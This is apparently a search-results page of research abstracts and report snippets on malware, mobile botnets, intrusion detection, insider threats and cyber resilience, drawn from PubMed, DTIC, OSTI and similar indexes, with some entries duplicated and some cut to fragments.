Botnet phenomenon in smartphones is evolving with the proliferation in mobile phone technologies after leaving imperative impact on personal computers. It refers to the network of computers, laptops, mobile devices or tablets which is remotely controlled by the cybercriminals to initiate various distributed coordinated attacks including spam emails, ad-click fraud, Bitcoin mining, Distributed Denial of Service (DDoS), disseminating other malwares and much more. Likewise traditional PC based botnet, Mobile botnets have the same operational impact except the target audience is particular to smartphone users. Therefore, it is import to uncover this security issue prior to its widespread adaptation. We propose SMARTbot, a novel dynamic analysis framework augmented with machine learning techniques to automatically detect botnet binaries from malicious corpus. SMARTbot is a component based off-device behavioral analysis framework which can generate mobile botnet learning model by inducing Artificial Neural Networks' back-propagation method. Moreover, this framework can detect mobile botnet binaries with remarkable accuracy even in case of obfuscated program code. The results conclude that, a classifier model based on simple logistic regression outperform other machine learning classifier for botnet apps' detection, i.e 99.49% accuracy is achieved. Further, from manual inspection of botnet dataset we have extracted interesting trends in those applications. As an outcome of this research, a mobile botnet dataset is devised which will become the benchmark for future studies.

A combinatorial model of malware diffusion via bluetooth connections.

PubMed

Merler, Stefano; Jurman, Giuseppe

2013-01-01

We outline here the mathematical expression of a diffusion model for cellphones malware transmitted through Bluetooth channels. In particular, we provide the deterministic formula underlying the proposed infection model, in its equivalent recursive (simple but computationally heavy) and closed form (more complex but efficiently computable) expression.

A Combinatorial Model of Malware Diffusion via Bluetooth Connections

PubMed Central

Merler, Stefano; Jurman, Giuseppe

2013-01-01

We outline here the mathematical expression of a diffusion model for cellphones malware transmitted through Bluetooth channels. In particular, we provide the deterministic formula underlying the proposed infection model, in its equivalent recursive (simple but computationally heavy) and closed form (more complex but efficiently computable) expression. PMID:23555677

Malware Mimics for Network Security Assessment

DTIC Science & Technology

2011-03-01

Master’s Thesis 4 . TITLE AND SUBTITLE Malware Mimics for Network Security Assessment 6. AUTHOR(S) Taff, William R and Salevski, Paul M. 5...Communication Protocol .......................41 viii 4 . Graphical User Interface for MM-Server .......43 C. BUILDING THE TEST PLATFORM...Extension ...............71 2. More Advanced Modules ........................72 3. Increase Scale of Test Bed ...................73 4 . Security

Collins Center Update. Volume 14, Issue 3, April-June 2012

DTIC Science & Technology

2012-06-01

2012 leaders must weigh the risks associated with these operations. Recent media reports of the ‘ Duqu ’, ‘Flame’, and ‘Stuxnet’ malware high- light...cyberspace operation was depen- dent upon intelligence, provided by the ‘ Duqu ’ and ‘Flame’ malware, to identify specific systems in the Natanz uranium

DROP: Detecting Return-Oriented Programming Malicious Code

NASA Astrophysics Data System (ADS)

Chen, Ping; Xiao, Hai; Shen, Xiaobin; Yin, Xinchun; Mao, Bing; Xie, Li

Return-Oriented Programming (ROP) is a new technique that helps the attacker construct malicious code mounted on x86/SPARC executables without any function call at all. Such technique makes the ROP malicious code contain no instruction, which is different from existing attacks. Moreover, it hides the malicious code in benign code. Thus, it circumvents the approaches that prevent control flow diversion outside legitimate regions (such as W ⊕ X ) and most malicious code scanning techniques (such as anti-virus scanners). However, ROP has its own intrinsic feature which is different from normal program design: (1) uses short instruction sequence ending in "ret", which is called gadget, and (2) executes the gadgets contiguously in specific memory space, such as standard GNU libc. Based on the features of the ROP malicious code, in this paper, we present a tool DROP, which is focused on dynamically detecting ROP malicious code. Preliminary experimental results show that DROP can efficiently detect ROP malicious code, and have no false positives and negatives.

Abnormally Malicious Autonomous Systems and their Internet Connectivity

DOE Office of Scientific and Technical Information (OSTI.GOV)

Shue, Craig A; Kalafut, Prof. Andrew; Gupta, Prof. Minaxi

While many attacks are distributed across botnets, investigators and network operators have recently targeted malicious networks through high profile autonomous system (AS) de-peerings and network shut-downs. In this paper, we explore whether some ASes indeed are safe havens for malicious activity. We look for ISPs and ASes that exhibit disproportionately high malicious behavior using ten popular blacklists, plus local spam data, and extensive DNS resolutions based on the contents of the blacklists. We find that some ASes have over 80% of their routable IP address space blacklisted. Yet others account for large fractions of blacklisted IP addresses. Several ASes regularlymore » peer with ASes associated with significant malicious activity. We also find that malicious ASes as a whole differ from benign ones in other properties not obviously related to their malicious activities, such as more frequent connectivity changes with their BGP peers. Overall, we conclude that examining malicious activity at AS granularity can unearth networks with lax security or those that harbor cybercrime.« less

Reactive Aggregate Model Protecting Against Real-Time Threats

DTIC Science & Technology

2014-09-01

on the underlying functionality of three core components. • MS SQL server 2008 backend database. • Microsoft IIS running on Windows server 2008...services. The capstone tested a Linux-based Apache web server with the following software implementations: • MySQL as a Linux-based backend server for...malicious compromise. 1. Assumptions • GINA could connect to a backend MS SQL database through proper configuration of DotNetNuke. • GINA had access

Tools for Rapid Understanding of Malware Code

DTIC Science & Technology

2015-05-07

cloaking techniques. We used three malware detectors, covering a wide spectrum of detection technologies, for our experiments: VirusTotal, an online ...Analysis and Manipulation ( SCAM ), 2014. [9] Babak Yadegari, Brian Johannesmeyer, Benjamin Whitely, and Saumya Debray. A generic approach to automatic...and Manipulation ( SCAM ), 2014. [9] Babak Yadegari, Brian Johannesmeyer, Benjamin Whitely, and Saumya Debray. A generic approach to automatic

(DEPSCOR FY 09) Obfuscation and Deobfuscation of Intent of Computer Programs

DTIC Science & Technology

2012-12-21

increased as the malware distribution mechanism has moved to the web through infected sites. In this use a site is hacked so as to distribute malware to...Simpósio Brasileiro em Segurança da Informaçao e de Sistemas Computacionais (2009). (Chen et al., 2012) Jundong Chen, Matthias R. Brust, Vir V. Phoha

Malicious Hubs: Detecting Abnormally Malicious Autonomous Systems

DOE Office of Scientific and Technical Information (OSTI.GOV)

Kalafut, Andrew J.; Shue, Craig A; Gupta, Prof. Minaxi

While many attacks are distributed across botnets, investigators and network operators have recently targeted malicious networks through high profile autonomous system (AS) de-peerings and network shut-downs. In this paper, we explore whether some ASes indeed are safe havens for malicious activity. We look for ISPs and ASes that exhibit disproportionately high malicious behavior using 12 popular blacklists. We find that some ASes have over 80% of their routable IP address space blacklisted and others account for large fractions of blacklisted IPs. Overall, we conclude that examining malicious activity at the AS granularity can unearth networks with lax security or thosemore » that harbor cybercrime.« less

Awareness of Malicious Social Engineering among Facebook Users

ERIC Educational Resources Information Center

Slonka, Kevin J.

2014-01-01

With the rapid growth of Facebook, the social networking website is becoming a lucrative target for malicious activity. Users of Facebook therefore should be aware of various malicious attacks and know how to identify them. This research analyzed Facebook users' level of understanding in the domain of malicious social engineering on Facebook. The…

Reliability Evaluation for Clustered WSNs under Malware Propagation

PubMed Central

Shen, Shigen; Huang, Longjun; Liu, Jianhua; Champion, Adam C.; Yu, Shui; Cao, Qiying

2016-01-01

We consider a clustered wireless sensor network (WSN) under epidemic-malware propagation conditions and solve the problem of how to evaluate its reliability so as to ensure efficient, continuous, and dependable transmission of sensed data from sensor nodes to the sink. Facing the contradiction between malware intention and continuous-time Markov chain (CTMC) randomness, we introduce a strategic game that can predict malware infection in order to model a successful infection as a CTMC state transition. Next, we devise a novel measure to compute the Mean Time to Failure (MTTF) of a sensor node, which represents the reliability of a sensor node continuously performing tasks such as sensing, transmitting, and fusing data. Since clustered WSNs can be regarded as parallel-serial-parallel systems, the reliability of a clustered WSN can be evaluated via classical reliability theory. Numerical results show the influence of parameters such as the true positive rate and the false positive rate on a sensor node’s MTTF. Furthermore, we validate the method of reliability evaluation for a clustered WSN according to the number of sensor nodes in a cluster, the number of clusters in a route, and the number of routes in the WSN. PMID:27294934

Reliability Evaluation for Clustered WSNs under Malware Propagation.

PubMed

Shen, Shigen; Huang, Longjun; Liu, Jianhua; Champion, Adam C; Yu, Shui; Cao, Qiying

2016-06-10

We consider a clustered wireless sensor network (WSN) under epidemic-malware propagation conditions and solve the problem of how to evaluate its reliability so as to ensure efficient, continuous, and dependable transmission of sensed data from sensor nodes to the sink. Facing the contradiction between malware intention and continuous-time Markov chain (CTMC) randomness, we introduce a strategic game that can predict malware infection in order to model a successful infection as a CTMC state transition. Next, we devise a novel measure to compute the Mean Time to Failure (MTTF) of a sensor node, which represents the reliability of a sensor node continuously performing tasks such as sensing, transmitting, and fusing data. Since clustered WSNs can be regarded as parallel-serial-parallel systems, the reliability of a clustered WSN can be evaluated via classical reliability theory. Numerical results show the influence of parameters such as the true positive rate and the false positive rate on a sensor node's MTTF. Furthermore, we validate the method of reliability evaluation for a clustered WSN according to the number of sensor nodes in a cluster, the number of clusters in a route, and the number of routes in the WSN.

A study on efficient detection of network-based IP spoofing DDoS and malware-infected Systems.

PubMed

Seo, Jung Woo; Lee, Sang Jin

2016-01-01

Large-scale network environments require effective detection and response methods against DDoS attacks. Depending on the advancement of IT infrastructure such as the server or network equipment, DDoS attack traffic arising from a few malware-infected systems capable of crippling the organization's internal network has become a significant threat. This study calculates the frequency of network-based packet attributes and analyzes the anomalies of the attributes in order to detect IP-spoofed DDoS attacks. Also, a method is proposed for the effective detection of malware infection systems triggering IP-spoofed DDoS attacks on an edge network. Detection accuracy and performance of the collected real-time traffic on a core network is analyzed thru the use of the proposed algorithm, and a prototype was developed to evaluate the performance of the algorithm. As a result, DDoS attacks on the internal network were detected in real-time and whether or not IP addresses were spoofed was confirmed. Detecting hosts infected by malware in real-time allowed the execution of intrusion responses before stoppage of the internal network caused by large-scale attack traffic.

Towards Countering the Rise of the Silicon Trojan

DTIC Science & Technology

The Trojan Horse has a venerable if unwelcome history and it is still regarded by many as the primary component in Computer Network Attack. Trojans ... Trojans have in the vast majority taken the form of malicious software. However, more recent times have seen the emergence of what has been dubbed by some...as the ’Silicon Trojan ’ these trojans are embedded at the hardware level and can be designed directly into chips and devices. The complexity of the

Protection of Mobile Agents Execution Using a Modified Self-Validating Branch-Based Software Watermarking with External Sentinel

NASA Astrophysics Data System (ADS)

Tomàs-Buliart, Joan; Fernández, Marcel; Soriano, Miguel

Critical infrastructures are usually controlled by software entities. To monitor the well-function of these entities, a solution based in the use of mobile agents is proposed. Some proposals to detect modifications of mobile agents, as digital signature of code, exist but they are oriented to protect software against modification or to verify that an agent have been executed correctly. The aim of our proposal is to guarantee that the software is being executed correctly by a non trusted host. The way proposed to achieve this objective is by the improvement of the Self-Validating Branch-Based Software Watermarking by Myles et al.. The proposed modification is the incorporation of an external element called sentinel which controls branch targets. This technique applied in mobile agents can guarantee the correct operation of an agent or, at least, can detect suspicious behaviours of a malicious host during the execution of the agent instead of detecting when the execution of the agent have finished.

DOE Office of Scientific and Technical Information (OSTI.GOV)

Smith, Jared M; Ferber, Aaron E; Greenlee, Elliot D

Akatosh is a highly configurable system based on the integration of the capabilities of one or more Intrusion Detection Systems (IDS) and automated forensic analysis. Akatosh reduces the false positive rates of IDSs and alleviates costs of incident response by pointing forensic personnel to the root cause of an incident on affected endpoint devices. Akatosh is able to analyze a computer system in near real-time and provide operations and forensic analyst personnel with continuous feedback on the impact of malware and software on deployed systems. Additionally, Akatosh provides the ability to look back into any prior state in the historymore » of the computer system along with the ability to compare one or more prior system states with any other prior state.« less

Analysis of Malicious Traffic in Modbus/TCP Communications

NASA Astrophysics Data System (ADS)

Kobayashi, Tiago H.; Batista, Aguinaldo B.; Medeiros, João Paulo S.; Filho, José Macedo F.; Brito, Agostinho M.; Pires, Paulo S. Motta

This paper presents the results of our analysis about the influence of Information Technology (IT) malicious traffic on an IP-based automation environment. We utilized a traffic generator, called MACE (Malicious trAffic Composition Environment), to inject malicious traffic in a Modbus/TCP communication system and a sniffer to capture and analyze network traffic. The realized tests show that malicious traffic represents a serious risk to critical information infrastructures. We show that this kind of traffic can increase latency of Modbus/TCP communication and that, in some cases, can put Modbus/TCP devices out of communication.

Devious Chatbots - Interactive Malware with a Plot

NASA Astrophysics Data System (ADS)

Jonathan, Pan Juin Yang; Fung, Chun Che; Wong, Kok Wai

Many social robots in the forms of conversation agents or Chatbots have been put to practical use in recent years. Their typical roles are online help or acting as a cyber agent representing an organisation. However, there exists a new form of devious chatbots lurking in the Internet. It is effectively an interactive malware seeking to lure its prey not through vicious assault, but with seductive conversation. It talks to its prey through the same channel that is normally used for human-to-human communication. These devious chatbots are using social engineering to attack the uninformed and unprepared victims. This type of attacks is becoming more pervasive with the advent of Web 2.0. This survey paper presents results from a research on how this breed of devious Malware is spreading, and what could be done to stop it.

Examining Application Components to Reveal Android Malware

DTIC Science & Technology

2013-03-01

RGBDroid: a novel response-based approach to android privilege escalation attacks ”. Proceedings of the 5th USENIX conference on Large-Scale Exploits and...Wetherall. “These aren’t the droids you’re looking for: retrofitting android to protect data from imperious applications”. Proceedings of the 18th ACM...copyright protection in the United States. AFIT-ENG-13-M-19 EXAMINING APPLICATION COMPONENTS TO REVEAL ANDROID MALWARE THESIS Presented to the Faculty

CrossTalk: The Journal of Defense Software Engineering. Volume 20, Number 9, September 2007

DTIC Science & Technology

2007-09-01

underlying application framework, e.g., Java Enter- prise Edition or .NET. This increases the risk that consumer Web services not based on the same...weaknesses and vulnera- bilities that are targeted by attackers and malicious code. For example, Apache Axis 2 enables a Java devel- oper to simply...load his/her Java objects into the Axis SOAP engine. At runtime, it is the SOAP engine that determines which incoming SOAP request messages should be

CYBER SUPPLY CHAIN SECURITY: CAN THE BACKDOOR BE CLOSED WITH TRUSTED DESIGN, MANUFACTURING AND SUPPLY

DTIC Science & Technology

2016-08-01

components from making it into DoD systems. The benefits of trusted design and manufacturing would likely cost more, but would confidently minimize DoD...compromise products too high for an attacker. If the costs and effort needed are greater than the benefit to conduct an attack, malicious actors are...simplicity may be a better approach. While there are potential benefits to built-in hardware and software security, there may be just as many

Change of Detection: To Find the Terrorist within the Identification of the U.S. Army’s Insider Threat

DTIC Science & Technology

2012-06-08

Management, usually used in conjunction with the word System TRADOC Training and Doctrine Command UCMJ Uniform Code of Military Justice U.S. United...information system , whether a military member, a DOD civilian employee, or employee of another Federal agency or the private sector. Some...recommendations, however, address the broader scope of “ system components” or “computer software code” inside a system and intended to carry out a malicious

Dynamic Detection of Malicious Code in COTS Software

DTIC Science & Technology

2000-04-01

run the following documented hostile applets or ActiveX of these tools work only on mobile code (Java, ActiveX , controls: 16-11 Hostile Applets Tiny...Killer App Exploder Runner ActiveX Check Spy eSafe Protect Desktop 9/9 blocked NB B NB 13/17 blocked NB Surfinshield Online 9/9 blocked NB B B 13/17...Exploder is an ActiveX control top (@). that performs a clean shutdown of your computer. The interface is attractive, although rather complex, as McLain’s

Insider Threat Control: Using Universal Serial Bus (USB) Device Auditing to Detect Possible Data Exfiltration by Malicious Insiders

DTIC Science & Technology

2013-01-01

under Contract No. FA8721-05- C -0003 with Carnegie Mellon University for the operation of the Software Engineering Institute, a federally funded...logging capabilities or further modify the control to best suit its needs. 1.1 Audience and Structure of This Report This report is a hands -on guide...the follow- ing directory: C :\\Admin_Tools\\USB_Audit\\ When selecting a deployment path, avoid using spaces in directory names since this will cause

Final Technical Report. Project Boeing SGS

DOE Office of Scientific and Technical Information (OSTI.GOV)

Bell, Thomas E.

Boeing and its partner, PJM Interconnection, teamed to bring advanced “defense-grade” technologies for cyber security to the US regional power grid through demonstration in PJM’s energy management environment. Under this cooperative project with the Department of Energy, Boeing and PJM have developed and demonstrated a host of technologies specifically tailored to the needs of PJM and the electric sector as a whole. The team has demonstrated to the energy industry a combination of processes, techniques and technologies that have been successfully implemented in the commercial, defense, and intelligence communities to identify, mitigate and continuously monitor the cyber security of criticalmore » systems. Guided by the results of a Cyber Security Risk-Based Assessment completed in Phase I, the Boeing-PJM team has completed multiple iterations through the Phase II Development and Phase III Deployment phases. Multiple cyber security solutions have been completed across a variety of controls including: Application Security, Enhanced Malware Detection, Security Incident and Event Management (SIEM) Optimization, Continuous Vulnerability Monitoring, SCADA Monitoring/Intrusion Detection, Operational Resiliency, Cyber Range simulations and hands on cyber security personnel training. All of the developed and demonstrated solutions are suitable for replication across the electric sector and/or the energy sector as a whole. Benefits identified include; Improved malware and intrusion detection capability on critical SCADA networks including behavioral-based alerts resulting in improved zero-day threat protection; Improved Security Incident and Event Management system resulting in better threat visibility, thus increasing the likelihood of detecting a serious event; Improved malware detection and zero-day threat response capability; Improved ability to systematically evaluate and secure in house and vendor sourced software applications; Improved ability to continuously monitor and maintain secure configuration of network devices resulting in reduced vulnerabilities for potential exploitation; Improved overall cyber security situational awareness through the integration of multiple discrete security technologies into a single cyber security reporting console; Improved ability to maintain the resiliency of critical systems in the face of a targeted cyber attack of other significant event; Improved ability to model complex networks for penetration testing and advanced training of cyber security personnel« less

Malware Memory Analysis for Non-specialists: Investigating Publicly Available Memory Image for the Tigger Trojan Horse

DTIC Science & Technology

2014-06-01

Malware memory analysis for non-specialists Investigating publicly available memory image for the Tigger Trojan horse R...It examines a memory image infected with the Tigger/Syzor Trojan horse . Significance to defence and security Canadian Armed Forces (CAF...additional guidance. The first report written by the author in this series examined the Zeus Trojan horse , found in DRDC Valcartier TM 2013-018 308H[1

How Can Botnets Cause Storms? Understanding the Evolution and Impact of Mobile Botnets

DTIC Science & Technology

2014-01-01

Android.Bmaster [4] in China that had infected an estimate of hundreds of thousands of Android phones. As a result, mobile botnets have already become...malware via centralized infrastructures (e.g., using short and multimedia message services [1], [4], [5]). However, The work was sponsored by ARO staff...infrastructures (malware sending its copies using short/ multimedia message services or advertising its applications (APPs) on mobile markets [1], [4

Learning Enterprise Malware Triage from Automatic Dynamic Analysis

DTIC Science & Technology

2013-03-01

Kolter and Maloof n-gram method, Dube’s malware target recognition (MaTR) static method performs significantly more accurately at the 95% confidence...from the static method as in Kolter and Maloof. The MIST approach with behavior sequences 9 allows researchers to tailor the level of analysis to the...citations, none publish work that implements it. Only Kolter and Maloof use nearly as long gram structures, although that research uses static grams rather

An Architecture, System Engineering, and Acquisition Approach for Space System Software Resiliency

NASA Astrophysics Data System (ADS)

Phillips, Dewanne Marie

Software intensive space systems can harbor defects and vulnerabilities that may enable external adversaries or malicious insiders to disrupt or disable system functions, risking mission compromise or loss. Mitigating this risk demands a sustained focus on the security and resiliency of the system architecture including software, hardware, and other components. Robust software engineering practices contribute to the foundation of a resilient system so that the system "can take a hit to a critical component and recover in a known, bounded, and generally acceptable period of time". Software resiliency must be a priority and addressed early in the life cycle development to contribute a secure and dependable space system. Those who develop, implement, and operate software intensive space systems must determine the factors and systems engineering practices to address when investing in software resiliency. This dissertation offers methodical approaches for improving space system resiliency through software architecture design, system engineering, increased software security, thereby reducing the risk of latent software defects and vulnerabilities. By providing greater attention to the early life cycle phases of development, we can alter the engineering process to help detect, eliminate, and avoid vulnerabilities before space systems are delivered. To achieve this objective, this dissertation will identify knowledge, techniques, and tools that engineers and managers can utilize to help them recognize how vulnerabilities are produced and discovered so that they can learn to circumvent them in future efforts. We conducted a systematic review of existing architectural practices, standards, security and coding practices, various threats, defects, and vulnerabilities that impact space systems from hundreds of relevant publications and interviews of subject matter experts. We expanded on the system-level body of knowledge for resiliency and identified a new software architecture framework and acquisition methodology to improve the resiliency of space systems from a software perspective with an emphasis on the early phases of the systems engineering life cycle. This methodology involves seven steps: 1) Define technical resiliency requirements, 1a) Identify standards/policy for software resiliency, 2) Develop a request for proposal (RFP)/statement of work (SOW) for resilient space systems software, 3) Define software resiliency goals for space systems, 4) Establish software resiliency quality attributes, 5) Perform architectural tradeoffs and identify risks, 6) Conduct architecture assessments as part of the procurement process, and 7) Ascertain space system software architecture resiliency metrics. Data illustrates that software vulnerabilities can lead to opportunities for malicious cyber activities, which could degrade the space mission capability for the user community. Reducing the number of vulnerabilities by improving architecture and software system engineering practices can contribute to making space systems more resilient. Since cyber-attacks are enabled by shortfalls in software, robust software engineering practices and an architectural design are foundational to resiliency, which is a quality that allows the system to "take a hit to a critical component and recover in a known, bounded, and generally acceptable period of time". To achieve software resiliency for space systems, acquirers and suppliers must identify relevant factors and systems engineering practices to apply across the lifecycle, in software requirements analysis, architecture development, design, implementation, verification and validation, and maintenance phases.

DOE Office of Scientific and Technical Information (OSTI.GOV)

Lee, Hsien-Hsin S

The overall objective of this research project is to develop novel architectural techniques as well as system software to achieve a highly secure and intrusion-tolerant computing system. Such system will be autonomous, self-adapting, introspective, with self-healing capability under the circumstances of improper operations, abnormal workloads, and malicious attacks. The scope of this research includes: (1) System-wide, unified introspection techniques for autonomic systems, (2) Secure information-flow microarchitecture, (3) Memory-centric security architecture, (4) Authentication control and its implication to security, (5) Digital right management, (5) Microarchitectural denial-of-service attacks on shared resources. During the period of the project, we developed several architectural techniquesmore » and system software for achieving a robust, secure, and reliable computing system toward our goal.« less

Leveraging Client-Side DNS Failure Patterns to Identify Malicious Behaviors

DTIC Science & Technology

2015-09-28

malicious behavior found in our dataset and (ii) to create ground truth to evaluate the system proposed in Section V. We begin by removing those cases that...2011. [10] S. Hao, N. Feamster, and R. Pandrangi, “Monitoring the Initial DNS Behavior of Malicious Domains,” in ACM IMC , 2011. [11] R. Perdisci et...distribution is unlimited. Leveraging Client-Side DNS Failure Patterns to Identify Malicious Behaviors The views, opinions and/or findings contained in

Detecting the manipulation of digital clinical records in dental practice.

PubMed

Díaz-Flores-García, V; Labajo-González, E; Santiago-Sáez, A; Perea-Pérez, B

2017-11-01

Radiography provides many advantages in the diagnosis and management of dental conditions. However, dental X-ray images may be subject to manipulation with malicious intent using easily accessible computer software. In this study, we sought to evaluate a dentist's ability to identify a manipulated dental X-ray images, when compared with the original, using a variant of the methodology described by Visser and Kruger. Sixty-six dentists were invited to participate and evaluate 20 intraoral dental X-ray images, 10 originals and 10 modified, manipulated using Adobe Photoshop to simulate fillings, root canal treatments, etc. Participating dentists were correct in identifying the manipulated image in 56% of cases, 6% higher than by chance and 10% more than in the study by Visser and Kruger. Malicious changes to dental X-ray images may go unnoticed even by experienced dentists. Professionals must be aware of the legal consequences of such changes. A system of detection/validation should be created for radiographic images. Copyright © 2017 The College of Radiographers. Published by Elsevier Ltd. All rights reserved.

Index of cyber integrity

NASA Astrophysics Data System (ADS)

Anderson, Gustave

2014-05-01

Unfortunately, there is no metric, nor set of metrics, that are both general enough to encompass all possible types of applications yet specific enough to capture the application and attack specific details. As a result we are left with ad-hoc methods for generating evaluations of the security of our systems. Current state of the art methods for evaluating the security of systems include penetration testing and cyber evaluation tests. For these evaluations, security professionals simulate an attack from malicious outsiders and malicious insiders. These evaluations are very productive and are able to discover potential vulnerabilities resulting from improper system configuration, hardware and software flaws, or operational weaknesses. We therefore propose the index of cyber integrity (ICI), which is modeled after the index of biological integrity (IBI) to provide a holistic measure of the health of a system under test in a cyber-environment. The ICI provides a broad base measure through a collection of application and system specific metrics. In this paper, following the example of the IBI, we demonstrate how a multi-metric index may be used as a holistic measure of the health of a system under test in a cyber-environment.

Ultrabroadband photonic internet: safety aspects

NASA Astrophysics Data System (ADS)

Kalicki, Arkadiusz; Romaniuk, Ryszard

2008-11-01

Web applications became most popular medium in the Internet. Popularity, easiness of web application frameworks together with careless development results in high number of vulnerabilities and attacks. There are several types of attacks possible because of improper input validation. SQL injection is ability to execute arbitrary SQL queries in a database through an existing application. Cross-site scripting is the vulnerability which allows malicious web users to inject code into the web pages viewed by other users. Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains malicious request. Web spam in blogs. There are several techniques to mitigate attacks. Most important are web application strong design, correct input validation, defined data types for each field and parameterized statements in SQL queries. Server hardening with firewall, modern security policies systems and safe web framework interpreter configuration are essential. It is advised to keep proper security level on client side, keep updated software and install personal web firewalls or IDS/IPS systems. Good habits are logging out from services just after finishing work and using even separate web browser for most important sites, like e-banking.

IDMA: improving the defense against malicious attack for mobile ad hoc networks based on ARIP protocol

NASA Astrophysics Data System (ADS)

Peng, Chaorong; Chen, Chang Wen

2008-04-01

Malicious nodes are mounting increasingly sophisticated attacking operations on the Mobile Ad Hoc Networks (MANETs). This is mainly because the IP-based MANETs are vulnerable to attacks by various malicious nodes. However, the defense against malicious attack can be improved when a new layer of network architecture can be developed to separate true IP address from disclosing to the malicious nodes. In this paper, we propose a new algorithm to improve the defense against malicious attack (IDMA) that is based on a recently developed Assignment Router Identify Protocol (ARIP) for the clustering-based MANET management. In the ARIP protocol, we design the ARIP architecture based on the new Identity instead of the vulnerable IP addresses to provide the required security that is embedded seamlessly into the overall network architecture. We make full use of ARIP's special property to monitor gateway forward packets by Reply Request Route Packets (RREP) without additional intrusion detection layer. We name this new algorithm IDMA because of its inherent capability to improve the defense against malicious attacks. Through IDMA, a watching algorithm can be established so as to counterattack the malicious node in the routing path when it unusually drops up packets. We provide analysis examples for IDMA for the defense against a malicious node that disrupts the route discovery by impersonating the destination, or by responding with state of corrupted routing information, or by disseminating forged control traffic. The IDMA algorithm is able to counterattack the malicious node in the cases when the node lunch DoS attack by broadcast a large number of route requests, or make Target traffic congestion by delivering huge mount of data; or spoof the IP addresses and send forge packets with a fake ID to the same Target causing traffic congestion at that destination. We have implemented IDMA algorism using the GloMoSim simulator and have demonstrated its performance under a variety of operational conditions.

Automated Virtual Machine Introspection for Host-Based Intrusion Detection

DTIC Science & Technology

2009-03-01

boxes represent the code and data sections of each process in memory with arrows representing hooks planted by malware to jump to the malware code...a useful indication of intrusion, it is also susceptible to mimicry and concurrency attacks [Pro03,Wat07]. Additionally, most research abstracts away...sequence of system calls that accomplishes his or her intent [WS02]. This “ mimicry attack” takes advantage of the fact that many HIDS discard the pa

Unintentional Insider Threats: A Review of Phishing and Malware Incidents by Economic Sector

DTIC Science & Technology

2014-07-01

the conclusions in the Verizon Data Breach Report 2013 that 47% of malware was downloaded through e-mail at- tachments, 48% of hacking took place...the attackers pivoted onto other systems and databases and exfiltrated approximately 8.2 GB of data . BREACH : Accessing an employee account via a...Symantec. “Internet Security Threat Report 2014.” 2013 Trends 19 (April 2014). Symantec Cor- poration. [Verizon 2013] Verizon. 2013 Data Breach Investigations

Optimal Sector Sampling for Drive Triage

DTIC Science & Technology

2013-06-01

known files, which we call target data, that could help identify a drive holding evidence such as child pornography or malware. Triage is needed to sift...we call target data, that could help identify a drive holding evidence such as child pornography or malware. Triage is needed to sift through drives...situations where the user is looking for known data.1 One example is a law enforcement officer searching for evidence of child pornography from a large num

Order priors for Bayesian network discovery with an application to malware phylogeny

DOE PAGES

Oyen, Diane; Anderson, Blake; Sentz, Kari; ...

2017-09-15

Here, Bayesian networks have been used extensively to model and discover dependency relationships among sets of random variables. We learn Bayesian network structure with a combination of human knowledge about the partial ordering of variables and statistical inference of conditional dependencies from observed data. Our approach leverages complementary information from human knowledge and inference from observed data to produce networks that reflect human beliefs about the system as well as to fit the observed data. Applying prior beliefs about partial orderings of variables is an approach distinctly different from existing methods that incorporate prior beliefs about direct dependencies (or edges)more » in a Bayesian network. We provide an efficient implementation of the partial-order prior in a Bayesian structure discovery learning algorithm, as well as an edge prior, showing that both priors meet the local modularity requirement necessary for an efficient Bayesian discovery algorithm. In benchmark studies, the partial-order prior improves the accuracy of Bayesian network structure learning as well as the edge prior, even though order priors are more general. Our primary motivation is in characterizing the evolution of families of malware to aid cyber security analysts. For the problem of malware phylogeny discovery, we find that our algorithm, compared to existing malware phylogeny algorithms, more accurately discovers true dependencies that are missed by other algorithms.« less

Order priors for Bayesian network discovery with an application to malware phylogeny

DOE Office of Scientific and Technical Information (OSTI.GOV)

Oyen, Diane; Anderson, Blake; Sentz, Kari

Here, Bayesian networks have been used extensively to model and discover dependency relationships among sets of random variables. We learn Bayesian network structure with a combination of human knowledge about the partial ordering of variables and statistical inference of conditional dependencies from observed data. Our approach leverages complementary information from human knowledge and inference from observed data to produce networks that reflect human beliefs about the system as well as to fit the observed data. Applying prior beliefs about partial orderings of variables is an approach distinctly different from existing methods that incorporate prior beliefs about direct dependencies (or edges)more » in a Bayesian network. We provide an efficient implementation of the partial-order prior in a Bayesian structure discovery learning algorithm, as well as an edge prior, showing that both priors meet the local modularity requirement necessary for an efficient Bayesian discovery algorithm. In benchmark studies, the partial-order prior improves the accuracy of Bayesian network structure learning as well as the edge prior, even though order priors are more general. Our primary motivation is in characterizing the evolution of families of malware to aid cyber security analysts. For the problem of malware phylogeny discovery, we find that our algorithm, compared to existing malware phylogeny algorithms, more accurately discovers true dependencies that are missed by other algorithms.« less

A Study on Architecture of Malicious Code Blocking Scheme with White List in Smartphone Environment

NASA Astrophysics Data System (ADS)

Lee, Kijeong; Tolentino, Randy S.; Park, Gil-Cheol; Kim, Yong-Tae

Recently, the interest and demands for mobile communications are growing so fast because of the increasing prevalence of smartphones around the world. In addition, the existing feature phones were replaced by smartphones and it has widely improved while using the explosive growth of Internet users using smartphones, e-commerce enabled Internet banking transactions and the importance of protecting personal information. Therefore, the development of smartphones antivirus products was developed and launched in order to prevent malicious code or virus infection. In this paper, we proposed a new scheme to protect the smartphone from malicious codes and malicious applications that are element of security threats in mobile environment and to prevent information leakage from malicious code infection. The proposed scheme is based on the white list smartphone application which only allows installing authorized applications and to prevent the installation of malicious and untrusted mobile applications which can possibly infect the applications and programs of smartphones.

Using a Prediction Model to Manage Cyber Security Threats.

PubMed

Jaganathan, Venkatesh; Cherurveettil, Priyesh; Muthu Sivashanmugam, Premapriya

2015-01-01

Cyber-attacks are an important issue faced by all organizations. Securing information systems is critical. Organizations should be able to understand the ecosystem and predict attacks. Predicting attacks quantitatively should be part of risk management. The cost impact due to worms, viruses, or other malicious software is significant. This paper proposes a mathematical model to predict the impact of an attack based on significant factors that influence cyber security. This model also considers the environmental information required. It is generalized and can be customized to the needs of the individual organization.

Using a Prediction Model to Manage Cyber Security Threats

PubMed Central

Muthu Sivashanmugam, Premapriya

2015-01-01

Cyber-attacks are an important issue faced by all organizations. Securing information systems is critical. Organizations should be able to understand the ecosystem and predict attacks. Predicting attacks quantitatively should be part of risk management. The cost impact due to worms, viruses, or other malicious software is significant. This paper proposes a mathematical model to predict the impact of an attack based on significant factors that influence cyber security. This model also considers the environmental information required. It is generalized and can be customized to the needs of the individual organization. PMID:26065024

